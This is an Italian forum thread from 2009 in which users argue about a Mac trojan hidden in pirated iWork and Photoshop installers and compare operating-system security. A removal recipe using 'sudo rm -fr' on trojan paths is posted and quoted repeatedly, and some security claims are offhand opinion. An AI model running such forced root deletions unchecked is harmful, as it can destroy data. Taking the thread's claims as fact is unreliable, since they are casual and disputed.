            un proXXXXX :DSe esistono trojan/virus/worm, SI. più che semplice.Si installa in un minuto, si aggiorna automaticamente e se trova il malware te lo dice e ti chiede se vuoi rimuoverlo, con un solo click.Se cerchi in google, le prime procedure di rimozione di questo trojan su OSX consigliavano di andare via console a cercare dei file e cancellarli a mano.
          • MeX scrive:
            Re: Per i soliti Mac....
            vabbè se non consideri nemmeno le differenze tra virus/worm/trojan... non arriviamo da nessuna parte!
          • -ToM- scrive:
            Re: Per i soliti Mac....
            si parlava di AV, è giusto nomenare tutti i generi di malware che un antivirus previene.il thread è diventato inutile, siamo finiti a discutere sulla flessibile ed equivocabile interpretazione della lingua italiana quindi...PLONK(anche per il bene degli altri)
        • a n o n i m o scrive:
          Re: Per i soliti Mac....

          Hai ragione a dire che un virus è diverso da un
          trojan, però una volta che prendi il trojan non è
          mica detto che sia facile rimuoverlo. 1) aprire il terminale2) sudo rm -fr /Library/Receipts/iWorkServices.pkg /private/tmp/.iWorkServices/System/Library/StartupItems/iWorkServices /usr/bin/iWorkServices3) killall -9 iWorkServicesfine del problema.
          • nome e cognome scrive:
            Re: Per i soliti Mac....

            1) aprire il terminale
            2) sudo rm -fr
            /Library/Receipts/iWorkServices.pkg
            /private/tmp/.iWorkServices
            /System/Library/StartupItems/iWorkServices
            /usr/bin/iWorkServices
            3) killall -9 iWorkServices


            fine del problema.Sempre che nel frattempo l'amichetto non ti sia entrato nel mac e abbia sostituito tutti i tuoi programmi con qualcosa di piu' simpatico (visto che oltre ad avere una backdoor sa anche la tua password) ... e' ovvio che il tizio non e' ancora cosi' in gamba ma penso sia un architetto che ha trovato un manuale di c in biblioteca, dagli tempo.
          • pippo scrive:
            Re: Per i soliti Mac....

            Sempre che nel frattempo l'amichetto non ti sia
            entrato nel mac e abbia sostituito tutti i tuoi
            programmi con qualcosa di piu' simpatico (visto
            che oltre ad avere una backdoor sa anche la tua
            password) ... e' ovvio che il tizio non e' ancora
            cosi' in gamba ma penso sia un architetto che ha
            trovato un manuale di c in biblioteca, dagli
            tempo.(rotfl)(rotfl)(rotfl)
          • a n o n i m o scrive:
            Re: Per i soliti Mac....
            - Scritto da: nome e cognome

            1) aprire il terminale

            2) sudo rm -fr

            /Library/Receipts/iWorkServices.pkg

            /private/tmp/.iWorkServices

            /System/Library/StartupItems/iWorkServices

            /usr/bin/iWorkServices

            3) killall -9 iWorkServices





            fine del problema.

            Sempre che nel frattempo l'amichetto non ti sia
            entrato nel mac da dove?gli host del bot master sono down da poche ore dopo la scoperta.da dove lo controlla il bot? dal mondo delle favole?-----------------------------------------------------------Modificato dall' autore il 29 gennaio 2009 10.58-----------------------------------------------------------
          • nome e cognome scrive:
            Re: Per i soliti Mac....

            da dove?
            gli host del bot master sono down da poche ore
            dopo la
            scoperta.
            da dove lo controlla il bot? dal mondo delle
            favole?Eh? Tu usi mac vero? A chi vuole controllare il bot basta un internet cafe qualunque e l'ip dell'infetto... ma se anche volessi fare una cosa automatica basterebbe aprire dei canali IRC (vediamo quanto ci mettono a tirarli giu tutti), ammesso poi che serva realmente visto che se scrivessi io un worm la prima cosa che farei sarebbe di sostituire tutti i comandi di sistema con qualcosa di modificato da me.
          • a n o n i m o scrive:
            Re: Per i soliti Mac....
            - Scritto da: nome e cognome

            da dove?

            gli host del bot master sono down da poche ore

            dopo la

            scoperta.

            da dove lo controlla il bot? dal mondo delle

            favole?

            Eh? Tu usi mac vero? A chi vuole controllare il
            bot basta un internet cafe qualunque e l'ip
            dell'infetto... ma se anche volessi fare una cosa
            automatica basterebbe aprire dei canali IRC
            (vediamo quanto ci mettono a tirarli giu tutti),
            ammesso poi che serva realmente visto che se
            scrivessi io un worm la prima cosa che farei
            sarebbe di sostituire tutti i comandi di sistema
            con qualcosa di modificato da
            me.blabla blanf bla bla,ti ripeto la domanda cervellone: da dove viene controllato questo bot dato che i suoi host sono down?
          • nome e cognome scrive:
            Re: Per i soliti Mac....

            blabla blanf bla bla,
            ti ripeto la domanda cervellone:
            da dove viene controllato questo bot dato che
            i suoi host sono
            down? Tu sai come funziona una backdoor vero?
          • a n o n i m o scrive:
            Re: Per i soliti Mac....
            - Scritto da: nome e cognome

            blabla blanf bla bla,

            ti ripeto la domanda cervellone:

            da dove viene controllato questo bot dato che

            i suoi host sono

            down?

            Tu sai come funziona una backdoor vero?si, in compenso tu non sai come funziona questa backdoor, nel caso servisse la dimostrazione.continua pure dar aria alla bocca, non ti disturbo oltre.
          • pippo scrive:
            Re: Per i soliti Mac....


            Tu sai come funziona una backdoor vero?

            si, in compenso tu non sai come funziona
            questa backdoor, nel caso servisse la
            dimostrazione.


            continua pure dar aria alla bocca, non ti
            disturbo
            oltre.Ma non dobbiamo saperla noi, basta la sappia l'hacker...
          • nome e cognome scrive:
            Re: Per i soliti Mac....

            continua pure dar aria alla bocca, non ti
            disturbo
            oltre.Grazie stavi diventando scontato.
          • Lemon scrive:
            Re: Per i soliti Mac....
            - Scritto da: a n o n i m o

            Hai ragione a dire che un virus è diverso da un

            trojan, però una volta che prendi il trojan non
            è

            mica detto che sia facile rimuoverlo.


            1) aprire il terminale
            2) sudo rm -fr
            /Library/Receipts/iWorkServices.pkg
            /private/tmp/.iWorkServices
            /System/Library/StartupItems/iWorkServices
            /usr/bin/iWorkServices
            3) killall -9 iWorkServices


            fine del problema.Come ho già risposto a Mex io parlavo in generale, non al caso specifico. Quando con l'inganno si riesce ad operare come amministratori della macchina si può combianre quello che si vuole, anche su un Mac, in questi casi sono stati buoni gli scrittori del trojan.
      • Enjoy with Us scrive:
        Re: Per i soliti Mac....
        - Scritto da: MeX
        siamo ancora molto lontani da un virus.
        Questo é un pacchetto inserito in programmi molto
        appetibili e la richiesta della password é
        giustificata dall'installazione di iWork e
        Photoshop (che richiedono la password anche se
        non sono
        infetti)

        Sicuramente é un problema di sicurezza, anche se
        c'é da dire che su MAC praticamente MAI si cracca
        software ma si usano semplicemente i seriali (ti
        scarichi la trial di iWork dal sito Apple e sei a
        posto)

        Il virus é un meccanismo molto piú perverso.
        Su win ti basta aprire una email con un po' di
        javascript e sei fregato, o inserire una
        chiavetta USB con l'autorun.inf e ti ritrovi
        infettato... in piú se sei in una lan magicamente
        tutti i PC collegati risulteranno
        infetti...

        Qui si parla di un trojan, che si installa in
        seguito ad un'azione volontaria dell'utente... e
        comunque, basta cancellare il file e killare il
        proXXXXX e il trojan sparisce.... in win invece i
        virus si autoreplicano, si annidano nel registro
        etc
        etc...

        Mi sembra che siamo ancora molto lontani da
        questo tipo di problematiche di sicurezza su
        mac!Su questo hai perfettamente ragione... per ora!
      • -ToM- scrive:
        Re: Per i soliti Mac....
        - Scritto da: MeX
        Qui si parla di un trojan, che si installa in
        seguito ad un'azione volontaria dell'utente... e
        comunque, basta cancellare il file e killare ilQuando si dice lo stesso per windows però non vale, viva la coerenza (non è riferito direttamente a te)
        proXXXXX e il trojan sparisce.... in win invece i
        virus si autoreplicano, si annidano nel registro
        etc etc...ma non si parlava di Trojan?
        Mi sembra che siamo ancora molto lontani da
        questo tipo di problematiche di sicurezza su
        mac!no perchè non è l´unico della storia
        • MeX scrive:
          Re: Per i soliti Mac....


          proXXXXX e il trojan sparisce.... in win invece
          i

          virus si autoreplicano, si annidano nel registro

          etc etc...

          ma non si parlava di Trojan?
          il trojan va veicolato... di solito si veicola attraverso un virus (molto efficace) od un'esca (sarewares, cracks...)
      • Gianluca70 scrive:
        Re: Per i soliti Mac....
        - Scritto da: MeXAvevi cominciato bene, ma con quello che segue sei scaduto del tutto:
        Il virus é un meccanismo molto piú perverso.
        Su win ti basta aprire una email con un po' di
        javascript e sei fregato, o inserire una
        chiavetta USB con l'autorun.inf e ti ritrovi
        infettato... in piú se sei in una lan magicamente
        tutti i PC collegati risulteranno
        infetti...Quanto FUD in sole 6 righe:1. il javascript viene eseguito nel contesto del tuo utente, i danni li potrà fare solo nel tuo profilo, ma se apri porcheria come Domain Admin non dare la colpa al sistema2. idem per autorun.inf, dipende dal profilo user3. questa è la perla: se sei in lan infetti tutto? Hai visto troppi B-movie di fantascienza.Il tuo profilo utente di garantisce permission locali ed in rete, certo che sei apri schifezze come Enterprise Admin puoi sbrandare l'azienda, non ti lamentare se ti ritrovi a pulire bidoni della spazzatura il giorno dopo

        Qui si parla di un trojan, che si installa in
        seguito ad un'azione volontaria dell'utente... e
        comunque, basta cancellare il file e killare il
        proXXXXX e il trojan sparisce.... in win invece i
        virus si autoreplicano, si annidano nel registro
        etc
        etc...Sì sì, e ci sono i castori che incartano la cioccolata...Ma se non ti è nemmeno conXXXXX di scrivere nel registry senza permessi adeguati!Per favore, se non usate Windows, non parlatene al presente, piuttosto scrivete:"nel 1999, con Windows 98 succedeva questo..."ma ci vuole un po' di onestà intellettuale, e quelli che parlano di fatti non propri di solito sono i primi a mancarne...
        Mi sembra che siamo ancora molto lontani da
        questo tipo di problematiche di sicurezza su
        mac!Lontani forse, aspetta e vedrai, i Mac sono al 10% di diffusione, ora meritano attenzione :)
        • MeX scrive:
          Re: Per i soliti Mac....

          Quanto FUD in sole 6 righe:
          1. il javascript viene eseguito nel contesto del
          tuo utente, i danni li potrà fare solo nel tuo
          profilo, ma se apri porcheria come Domain Admin
          non dare la colpa al
          sistemain Windows XP l'utente é di default nel gruppo Administrator, l'utente casalingo dovrebbe invece preoccuparsi di togliere la sua utenza da Administrator e lasciarla in Users o SuperUsers...Inoltre l'installer di Windows di default accetta una password di admin VUOTA ed é veramente un'IDIOZIA!
          2. idem per autorun.inf, dipende dal profilo userche nel 97,436% é nel gruppo Administrator
          3. questa è la perla: se sei in lan infetti
          tutto? Hai visto troppi B-movie di
          fantascienza.giá, i worm non esistono!




          Sì sì, e ci sono i castori che incartano la
          cioccolata...
          Ma se non ti è nemmeno conXXXXX di scrivere nel
          registry senza permessi
          adeguati!peccato che il profilo utente é di default Adminstrator
          Per favore, se non usate Windows, non parlatene
          al presente, piuttosto
          scrivete:
          "nel 1999, con Windows 98 succedeva questo..."
          ma ci vuole un po' di onestà intellettuale, e
          quelli che parlano di fatti non propri di solito
          sono i primi a
          mancarne...mi sembra che Windows di default metta sempre l'utente nel gruppo Administrator... peró ammetto sono fermo ad XP
          Lontani forse, aspetta e vedrai, i Mac sono al
          10% di diffusione, ora meritano attenzione
          :)giá! bene!
          • Gianluca70 scrive:
            Re: Per i soliti Mac....
            Quindi mi stai confermando che non è l'OS XP in sè, ma la sua configurazione di default che non va bene, giusto?A parte che Vista non ha nemmeno più questo problema, e che anche su XP era facilmente risolvibile (un minimo di alfabetizzazione, please), l'utonto XP che da 7 anni (considero la data di uscita di XP, l'ultimo che hai usato) non abbia mai affrontato questioni di gestione utenze è sicuramente destinato a subire e combinare danni.Tanto quanto i macachi utonti che, credendosi immuni per diritto divino, scaricheranno programmi pirata e trojan e worm a bizzeffe, digiteranno la password di root quando richiesto (tanto sono immune, ecXXXXXXvolocihoilmakiomingaunpicciwinzozqualunque) e ricomincerà il gioco dell'impestato e delle reti di bot :)http://marketshare.hitslink.com/os-market-share.aspx?qprid=9il 10% probabilmente ha ingolosito i signori delle botnet, vuoi mettere poi che potenza di fuoco hai a disposizione, viste le performance dei MAC? :)
          • pippo scrive:
            Re: Per i soliti Mac....

            Quindi mi stai confermando che non è l'OS XP in
            sè, ma la sua configurazione di default che non
            va bene,
            giusto?
            Se ti può consolare opensuse 11.1 mi ha installato come amministratore e con autologon di DEFAULT :|
          • MeX scrive:
            Re: Per i soliti Mac....
            - Scritto da: Gianluca70
            Quindi mi stai confermando che non è l'OS XP in
            sè, ma la sua configurazione di default che non
            va bene,
            giusto?non solo l'installazione di default, ma pure l'installazione out of the box di Dell, HP, Sony...
            A parte che Vista non ha nemmeno più questo
            problema, e che anche su XP era facilmente
            risolvibile (un minimo di alfabetizzazione,
            please), l'utonto XP che da 7 anni (considero la
            data di uscita di XP, l'ultimo che hai usato) non
            abbia mai affrontato questioni di gestione utenze
            è sicuramente destinato a subire e combinare
            danni.uhm... dai... tua mamma sà come funziona il motore del frigo? no al massimo gira il termostato quando mette il pesce fresco... il computer dev'essere come un elettrodomestico...
            Tanto quanto i macachi utonti che, credendosi
            immuni per diritto divino, scaricheranno
            programmi pirata e trojan e worm a bizzeffe,
            digiteranno la password di root quando richiesto
            (tanto sono immune,
            ecXXXXXXvolocihoilmakiomingaunpicciwinzozqualunque

            http://marketshare.hitslink.com/os-market-share.as

            il 10% probabilmente ha ingolosito i signori
            delle botnet, vuoi mettere poi che potenza di
            fuoco hai a disposizione, viste le performance
            dei MAC?
            :)beh... torno a ricordati due cose:1. è anomalo usare crack su mac, si usano i seriali, quindi già il fatto che ci sia il crack è sospettoso2. se mi scarico l'app freeware che fa (boh.. qualsiasi cosa) e mi chiede la password di admin in fase di installazione... beh semplicemente non la installo... solo software molto complessi o integrati con il sistema fanno questo tipo di richiesta
    • nome e cognome scrive:
      Re: Per i soliti Mac....

      Ecco perchè è meglio Linux e il mondo open, li i
      crack non sono necessari e visto come è gestita
      l'installazione dei programmi è ben difficile che
      possa essere introdotto del software malevolo, se
      anche venisse fatto la cosa risulterebbe nota nel
      giro di poche ore, con l'eliminazione del
      programma!Vero! Ci sono voluti solo 2 anni per capire che tutte le debian installate nel mondo avevano solo 32000 chiavi crittografiche possibili (e quindi si poteva sfondare ssh, openvpn, ssl in 10 minuti di bruteforce).Dovete ringraziare che nessuno, proprio nessuno, guarda i sorgenti...
      • AtariLover scrive:
        Re: Per i soliti Mac....
        se non ricordo male non era sulla stable... o no? :|
        • nome e cognome scrive:
          Re: Per i soliti Mac....
          - Scritto da: AtariLover
          se non ricordo male non era sulla stable... o no?
          :|Si diciamo di si, la release Sarge del 2005 era immune visto che il "fix" e' stato fatto nel 2006, Ubuntu invece era dentro in pieno, tutte le release.
    • unaDuraLezione scrive:
      Re: Per i soliti Mac....
      contenuto non disponibile
      • Enjoy with Us scrive:
        Re: Per i soliti Mac....
        - Scritto da: unaDuraLezione
        - Scritto da: Enjoy with Us



        Ecco perchè è meglio Linux e il mondo open, li i

        crack non sono necessari

        Non c'entra nulla.
        Io uso Windows e non ho alcun software cracckato.
        Installo soprattutto software open source.
        Il fatto di "dover" cracckare software non
        dipende dal sistema operativo ma dalla mentalità
        'voglio tutto, anche quello che non
        uso'.
        Abbi pazienza questo su Linux al giorno d'oggi non è possibile, su mac e win invece si!Non mi risulta infatti che esistano per Linux software commerciali che per poter essere installati a sbaffo dall'utente vanno craccati!Ergo Linux in questo è più sicuro in quanto non spinge l'utente ad utilizzare software craccato in quanto non ne esiste!
    • -ToM- scrive:
      Re: Per i soliti Mac....
      ...e quando i virus saranno più di uno, dovranno fare i conti con i virus che stanno dentro ai crack per gli antivirus, perchè anche nel mondo Apple si scarica e si copia. ;)Almeno la smetteranno di parlare male degli altri OS senza cognizione di causa.E´ cultura informatica anche questa :)
      • MonsterS4r scrive:
        Re: Per i soliti Mac....
        - Scritto da: -ToM-
        ...e quando i virus saranno più di uno, dovranno
        fare i conti con i virus che stanno dentro ai
        crack per gli antivirus, perchè anche nel mondo
        Apple si scarica e si copia.
        ;)
        Almeno la smetteranno di parlare male degli altri
        OS senza cognizione di
        causa.
        E´ cultura informatica anche questa :)Se, quando , un giorno , ....
        • -ToM- scrive:
          Re: Per i soliti Mac....
          - Scritto da: MonsterS4r
          Se, quando , un giorno , ....Molto vicino. e questo è un problema che riguarda tutti.
          • MonsterS4r scrive:
            Re: Per i soliti Mac....
            Quando sará installero' anch'io il mio bell'antivirus.Per il momento non mi serve
          • pippo scrive:
            Re: Per i soliti Mac....

            Quando sará installero' anch'io il mio
            bell'antivirus.
            Per il momento non mi serveSpero ti funzioni il backup :D
          • MonsterS4r scrive:
            Re: Per i soliti Mac....
            - Scritto da: pippo

            Quando sará installero' anch'io il mio

            bell'antivirus.

            Per il momento non mi serve
            Spero ti funzioni il backup :DPiu' che altro spero funzioni il restore ;D
          • pippo scrive:
            Re: Per i soliti Mac....


            Spero ti funzioni il backup :D

            Piu' che altro spero funzioni il restore ;DVolevo vedere se eri attento ;)
          • Fuffa scrive:
            Re: Per i soliti Mac....
            - Scritto da: pippo


            Spero ti funzioni il backup :D



            Piu' che altro spero funzioni il restore ;D
            Volevo vedere se eri attento ;)Certo che fra tutti e due...Se non va il backup, da che fai il restore? :)
          • MonsterS4r scrive:
            Re: Per i soliti Mac....
            Se sei avanti .... non ci avevo pensato minimamenteSei troppo avanti
          • MeX scrive:
            Re: Per i soliti Mac....
            tranquillo!http://www.apple.com/support/leopard/timemachine/
          • pippo scrive:
            Re: Per i soliti Mac....

            http://www.apple.com/support/leopard/timemachine/Così puoi ripristinare anche il virus?
          • MeX scrive:
            Re: Per i soliti Mac....
            puoi navigare indietro nel tempo fino al giorno che ti interessa e ripristinare da quella data... basta scegliere una data antecedente all'infezione
          • pippo scrive:
            Re: Per i soliti Mac....

            puoi navigare indietro nel tempo fino al giorno
            che ti interessa e ripristinare da quella data...
            basta scegliere una data antecedente
            all'infezioneChe indovinerai leggendo i fondi di caffè, o i virus per mac sono così gentili da segnalarti quando si installano e dove? :D
          • MeX scrive:
            Re: Per i soliti Mac....
            uhm... no... apri la cartella dove é presente il virus...avvi time machine e un'accattivante interfaccia grafica ti fa andare indietro nel tempo... prosegui fino a quando il file o la cartella scompare e premi il tastone restore.http://www.youtube.com/watch?v=nWdkfCwd4qU
          • pippo scrive:
            Re: Per i soliti Mac....

            uhm... no... apri la cartella dove é presente il
            virus...E cosa ho detto io, il virus ti segnala dove si installa, così puoi rimuoverlo comodamente O)Che gentili questi virus per mac... :D
          • MeX scrive:
            Re: Per i soliti Mac....
            ah beh se parliamo di cose che non esistono (virus per mac) allora Steve creerà un rosario che strofinato tra le mani rimuoverà ogni infezione!Anche la congiuntivite al gatto! :D
          • -ToM- scrive:
            Re: Per i soliti Mac....
            strano, jobs ha detto quasi il contrario.Invece VI serve perchè SE C´ERA, questo trojan non sarebbe stato un problema.
    • Fuffa scrive:
      Re: Per i soliti Mac....
      - Scritto da: Enjoy with Us
      Ecco perchè è meglio Linux e il mondo open, li i
      crack non sono necessari e visto come è gestita
      l'installazione dei programmi è ben difficile che
      possa essere introdotto del software malevolo, se
      anche venisse fatto la cosa risulterebbe nota nel
      giro di poche ore, con l'eliminazione del
      programma!Illuso...Poi parli come se tutti software che uno installa su linux provengano dai repository...cosa non vera.
      • Enjoy with Us scrive:
        Re: Per i soliti Mac....
        - Scritto da: Fuffa
        - Scritto da: Enjoy with Us

        Ecco perchè è meglio Linux e il mondo open, li i

        crack non sono necessari e visto come è gestita

        l'installazione dei programmi è ben difficile
        che

        possa essere introdotto del software malevolo,
        se

        anche venisse fatto la cosa risulterebbe nota
        nel

        giro di poche ore, con l'eliminazione del

        programma!

        Illuso...
        Poi parli come se tutti software che uno installa
        su linux provengano dai repository...cosa non
        vera.Beh nella maggior parte dei casi è proprio così e negli altri casi basta andare a prelevarlo da siti "seri".... comunque a me a tutt'oggi non mi risulta neanche un singolo cavallo di XXXXX per il mondo Linux!
        • Fuffa scrive:
          Re: Per i soliti Mac....
          - Scritto da: Enjoy with Us
          Beh nella maggior parte dei casi è proprio così e
          negli altri casi basta andare a prelevarlo da
          siti "seri".... comunque a me a tutt'oggi non mi
          risulta neanche un singolo cavallo di XXXXX per
          il mondo Linux!Si ma l'utente comune non ne capisce di siti "seri", ed è l'utente comune che è più soggetto a questi problemi.Quindi discorso campato in aria...
          • Enjoy with Us scrive:
            Re: Per i soliti Mac....
            - Scritto da: Fuffa
            - Scritto da: Enjoy with Us

            Beh nella maggior parte dei casi è proprio così
            e

            negli altri casi basta andare a prelevarlo da

            siti "seri".... comunque a me a tutt'oggi non mi

            risulta neanche un singolo cavallo di XXXXX per

            il mondo Linux!

            Si ma l'utente comune non ne capisce di siti
            "seri", ed è l'utente comune che è più soggetto a
            questi
            problemi.

            Quindi discorso campato in aria...L'utente comune si accontenterà del repository, chi cercherà altro non sarà certo l'utente comune!
  • lellykelly scrive:
    comunque è peggio che su win
    su win quando credendoti un accher tiri giu un programma, che ha il suo bel keygen dentro uno zip o ancora meglio dentro un exe, spera di avere un antivirus decente, altrimenti non sai neppure che c'è un trojan.su mac invece, quando installi un sw, devi autorizzare il programma d'installazione e se un furbone ha aggiunto un pacchetto "simpatico" agli altri, sei fregato.comunque non è una brutta notizia, almeno ci si rende conto che non bisogna mai dare per scontato nulla. e soprattutto molti barboni adesso avranno il broncio. metti che hai installato iwork e non sai se hai l'intruso? che fai? nel dubbio formatti?tanto è gratis... anche il tecnico che ti fa tornare a lavorare? ( perchè è ovvio che è l'utenza businness che ne ha aprofittato... )
  • picard12 scrive:
    ma che ideona..
    Un troijan che per essere installato richiede una password è proprio educato... non come quelli di win... tutti maleducati..A questo punto, dopo questa news, farebbero bene a produrre un antivirus per il trojan seduto sulla sedia..
  • me_medesimo scrive:
    Cosa cosa cosa???
    Dunque, prendo paro paro dal testo di Arenzulla....ehm no, scusate di Annunziata :D :$(anonimo)(anonimo)(anonimo) "Ebbene sì, il trojan c'è e si vede in giro. Certo bisogna inserire la propria password di sistema perché agisca, e bisogna pure aver violato la legge scaricando un pacchetto di installazione di iWork 09 o un crack per Photoshop CS4: ma la favola dei Mac scevri da ogni contaminazione virale da molti viene messa in soffitta." dunque, facendo un paragone (forzando un pochino la mano, tanto per riderci su): io vado dal marito di Nicole Kidman, gli chiedo se mi da le chiavi di casa sua e se puo' telefonare a sua moglie chiedendogli di aspettarlo a letto tutta nuda con una benda sugli occhi e i tappi agli orecchi. Il marito acconsente, io gli do' una botta in testa e vado felice e contento verso la mia destinazione da sogno.WOW, che super criminale che sono, eh??? (rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl)(rotfl) Ma andiamo avanti: "Intego, che produce un antivirus per Mac OSX che assicura sia in grado di proteggere l'utente da queste due nuove minacce..." ahhhh, si certo certo ora ho capito: (ghost)(troll)(troll)(troll)(troll)(troll)buona notte a tuttiPS: meno male che mia moglie non legge punto informatico, altrimenti altro che Nicole Kidman O) :@ :@(nolove)(nolove)
    • Fuffa scrive:
      Re: Cosa cosa cosa???
      L'unico problema è che entrando nella stanza di Nicole, ghignando pensando ancora a quanto fesso fosse è suo marito, ti accorgi che ti ritrovi circondato da una decina di omoni (decisamente non eterosessuali)... fai per girare i tacchi, ma ti accorgi che la porta si è già richiusa dietro di te.Ups :)
      • lellykelly scrive:
        Re: Cosa cosa cosa???
        queste cose le sai perchè sei abituato da molto tempo?
        • Fuffa scrive:
          Re: Cosa cosa cosa???
          Quanto è vecchia questo tipo di risposta? Creatività zero eh :)Le mie condoglianze...
          • Ahi ahi scrive:
            Re: Cosa cosa cosa???
            - Scritto da: Fuffa
            Quanto è vecchia questo tipo di risposta?
            Creatività zero eh
            :)

            Le mie condoglianze...Sei obsoleto pure tu, aggiornati
    • beaver scrive:
      Re: Cosa cosa cosa???
      A parte che nicole kidman non e' sta gran bellezza... vabbe' de gustibus...
  • nonlodico scrive:
    Non posso dirlo al mio amico
    C'è un mio amico fan del mac (in vita sua ha usato solo quello), che ha convinto altri due miei amici a comprare il mac (questi altri due miei amici di computer non ci capiscono un fico secco...) rassicurandoli che il mac è esente da qualsiasi tipo di virus e affini!Adesso non posso dirgli che esistono virus anche per il mac, perchè quando gli si parla male dell'Apple in genere, si arrabbia moltissimo... :@
    • alexjenn scrive:
      Re: Non posso dirlo al mio amico
      - Scritto da: nonlodico
      C'è un mio amico fan del mac (in vita sua ha
      usato solo quello), che ha convinto altri due
      miei amici a comprare il mac (questi altri due
      miei amici di computer non ci capiscono un fico
      secco...) rassicurandoli che il mac è esente da
      qualsiasi tipo di virus e
      affini!
      Adesso non posso dirgli che esistono virus anche
      per il mac, perchè quando gli si parla male
      dell'Apple in genere, si arrabbia moltissimo...
      :@Vero, specialmente quando la notizia (e la soluzione del virus) viene fornita da un'azienda che produce antivirus...In fin dei conti, molti utenti Mac vengono dal mondo Windows, e non ci vuole niente per imbrogliarli.
      • nome e cognome scrive:
        Re: Non posso dirlo al mio amico

        Vero, specialmente quando la notizia (e la
        soluzione del virus) viene fornita da un'azienda
        che produce
        antivirus...Caspita di solito la notizia di nuovi virus in circolazione e relativi antivirus vengono fornite dalle societa' che producono cioccolatini...
        In fin dei conti, molti utenti Mac vengono dal
        mondo Windows, e non ci vuole niente per
        imbrogliarli.Infatti hanno comprato un mac...
        • alexjenn scrive:
          Re: Non posso dirlo al mio amico
          - Scritto da: nome e cognome

          Vero, specialmente quando la notizia (e la

          soluzione del virus) viene fornita da un'azienda

          che produce

          antivirus...

          Caspita di solito la notizia di nuovi virus in
          circolazione e relativi antivirus vengono fornite
          dalle societa' che producono
          cioccolatini...Questa tua risposta conferma quello che ho scritto qui sotto


          In fin dei conti, molti utenti Mac vengono dal

          mondo Windows, e non ci vuole niente per

          imbrogliarli.

          Infatti hanno comprato un mac...
    • MarcOsX scrive:
      Re: Non posso dirlo al mio amico
      E che c'entrano i virus?
    • FinalCut scrive:
      Re: Non posso dirlo al mio amico
      - Scritto da: nonlodico
      Adesso non posso dirgli che esistono virus anche
      per il mac, perchè quando gli si parla male
      dell'Apple in genere, si arrabbia moltissimo...e avrebbe ragione, perché diresti solo una castroneria.Qui si parla di un trojan ben lontano dalla capacità autoriproduttive tipiche di un virus!Se tu credi di essere un esperto, sei messo bene...(linux)(apple)
    • lellykelly scrive:
      Re: Non posso dirlo al mio amico
      puoi dirgli che se compra sempre software originale, sarà a posto e non dovrà preoccuparsi.ovviamente fin che non metteranno pure li i simpatici amichetti.
      • lellykelly scrive:
        Re: Non posso dirlo al mio amico
        potrai continuare a dirgli che se naviga sarà tranquillo, ma lui ti chiederà perchè tu non lo sei...
    • beaver scrive:
      Re: Non posso dirlo al mio amico
      - Scritto da: nonlodico
      C'è un mio amico fan del mac (in vita sua ha
      usato solo quello), che ha convinto altri due
      miei amici a comprare il mac (questi altri due
      miei amici di computer non ci capiscono un fico
      secco...) rassicurandoli che il mac è esente da
      qualsiasi tipo di virus e
      affini!
      Adesso non posso dirgli che esistono virus anche
      per il mac, perchè quando gli si parla male
      dell'Apple in genere, si arrabbia moltissimo...
      :@Ecco adesso invece di sparare XXXXXXX chiedi a quelle 2 persone se sono contente del loro mac e se tornerebbero a windows vista.
    • Ahi ahi scrive:
      Re: Non posso dirlo al mio amico
      - Scritto da: nonlodico
      C'è un mio amico fan del mac (in vita sua ha
      usato solo quello), che ha convinto altri due
      miei amici a comprare il mac (questi altri due
      miei amici di computer non ci capiscono un fico
      secco...) rassicurandoli che il mac è esente da
      qualsiasi tipo di virus e
      affini!
      Adesso non posso dirgli che esistono virus anche
      per il mac, perchè quando gli si parla male
      dell'Apple in genere, si arrabbia moltissimo...
      :@Metti che non usa quei 2 sw e anche se li usa non li scarica dal P2P ma se li compra...gli spieghi anche che non ha problemi in questo caso?
  • Sgabbio scrive:
    Che ritorardo....
    giorni fà girava la notizia, comunque sta storia del trojan mi puzza molto, soprattutto da come viene raccontata dalla società di sicurezza in questione.Ma poi scusate, su OSX richiede la PASS per installare qualcosa, quindi sicuramente fa due richieste....un sospetto per un utente Mac verrebbe....Hmmm è se fosse una mossa per scoraggiare di scaricare iWork piratato ? :D(che poi basterebbe scaricare la trail dal sito della apple...)
    • FinalCut scrive:
      Re: Che ritorardo....
      - Scritto da: Sgabbio
      Ma poi scusate, su OSX richiede la PASS per
      installare qualcosa, quindi sicuramente fa due
      richieste....un sospetto per un utente Mac
      verrebbe....Non credo se ben fatto una password potrebbe essere necessaria a far partire i due processi.Oppure semplicemente potresti pensare di aver digiatato male la prima volta e la inserisci una seconda volta.Quando al fatto che il trojan sia vero non lo metto in dubbio, ma non è un virus e richiedere la passwrd per funzionare.Quindi al massimo qui si parla di un nuovo tipo di phinshing... non di virus, forse nemmeno trojan ad essere pignoli pignoli.
      • Sgabbio scrive:
        Re: Che ritorardo....
        Lo chiamano Trojan forse perchè viene messo in un software come iWork. Comunque mi sa che che adesso molti scaricaranno la trail dal sito della apple invece che andare sul p2p
    • Jazo scrive:
      Re: Che ritorardo....
      appunto uno si può scaricare la trial e mettergli su un seriale ... o no?
  • alexjenn scrive:
    Allora l'iPhone è chiuso...
    e questa parte dell'articolo l'avevo più volte profetizzato, er esempio qui, poco fa:http://punto-informatico.it/b.aspx?i=2535126&m=2535558#p2535558"Sebbene la scelta di Apple non si sia rivelata troppo popolare tra gli addetti ai lavori, forse a Mountain View oggi c'è qualcuno che pensa che tutto sommato non gli sarebbe dispiaciuto aver fatto qualcosa di simile anche con Android e il suo Marketplace. MemoryUp Personal, piccolo software che avrebbe dovuto avere il compito di liberare memoria RAM per consentire la più rapida esecuzione di altri programmi sviluppato da eMobiStudio, si è rivelato una piccola serpe in seno: decine di utenti hanno lamentato perdite di dati connesse all'utilizzo di questa applicazione, accusata anche di fare spam con la lista contatti presente nel cell."Capito perché Apple ritiene necessario avallare i programmi che possono essere distribuiti da App Store?-----------------------------------------------------------Modificato dall' autore il 29 gennaio 2009 00.20-----------------------------------------------------------
    • FinalCut scrive:
      Re: Allora l'iPhone è chiuso...
      - Scritto da: alexjenn
      e questa parte dell'articolo l'avevo più volte
      profetizzato, er esempio qui, poco
      fa:

      http://punto-informatico.it/b.aspx?i=2535126&m=253
      Mi dispiace per Google, ma mi farebbe taaanto piacere che qualche piccola epidemia di virus evidenziasse i pericoli di una architettura completamente open su un cellulare.Visto che Apple è stata criticata tanto per le sue scelte cautelative.Quanto a WinMo, non ha mai preso un buona percentuale di mercato per essere considerato un valido bersaglio.(linux)(apple)
      • alexjenn scrive:
        Re: Allora l'iPhone è chiuso...
